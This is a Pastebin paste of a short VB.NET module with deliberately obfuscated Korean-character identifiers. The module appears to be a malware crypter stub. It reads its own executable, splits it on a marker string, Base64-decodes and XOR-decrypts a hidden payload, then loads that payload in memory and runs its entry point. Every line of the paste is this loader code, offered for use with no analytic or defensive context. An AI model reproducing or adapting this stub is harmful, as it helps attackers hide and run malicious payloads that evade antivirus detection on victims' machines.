Advertisement
diele12250

Untitled

Oct 6th, 2019
118
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.40 KB | None | 0 0
  1. Module 있있그다다
  2. Const 리든다그특 = "KrawkBasicGen"
  3. Dim 있이서우다() As String = Split(IO.File.ReadAllText(Reflection.Assembly.GetExecutingAssembly.Location), 리든다그특)
  4. Dim 있다래그그 As Byte()
  5. Public xorkeyy As String = 있이서우다(2)
  6. Sub Main()
  7. 있다래그그 = Xor_Decrypt(Convert.FromBase64String((있이서우다(1))))
  8. Dim 다그서수다 As Object = Reflection.Assembly.Load(있다래그그).EntryPoint.Invoke(Nothing, Nothing)
  9. End Sub
  10. Public Function Xor_Decrypt(ByVal 다리다든서 As Byte()) As Byte()
  11. Dim 든든서이래 As Byte() = System.Text.Encoding.ASCII.GetBytes(xorkeyy)
  12. Dim 다이다있습 As Integer = 다리다든서(다리다든서.Length - 1) Xor 112
  13. Dim 그우다이습(다리다든서.Length) As Byte
  14. Dim 특의그그있 As Integer
  15. For 있있그다다0 As Integer = 0 To 다리다든서.Length - 1
  16. 그우다이습(있있그다다0) = (다리다든서(있있그다다0) Xor 다이다있습) Xor 든든서이래(특의그그있)
  17. If 특의그그있 = xorkeyy.Length - 1 Then 특의그그있 = 0 Else 특의그그있 = 특의그그있 + 1
  18. Next
  19. ReDim Preserve 그우다이습(다리다든서.Length - 2)
  20. Return 그우다이습
  21. End Function
  22. End Module
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement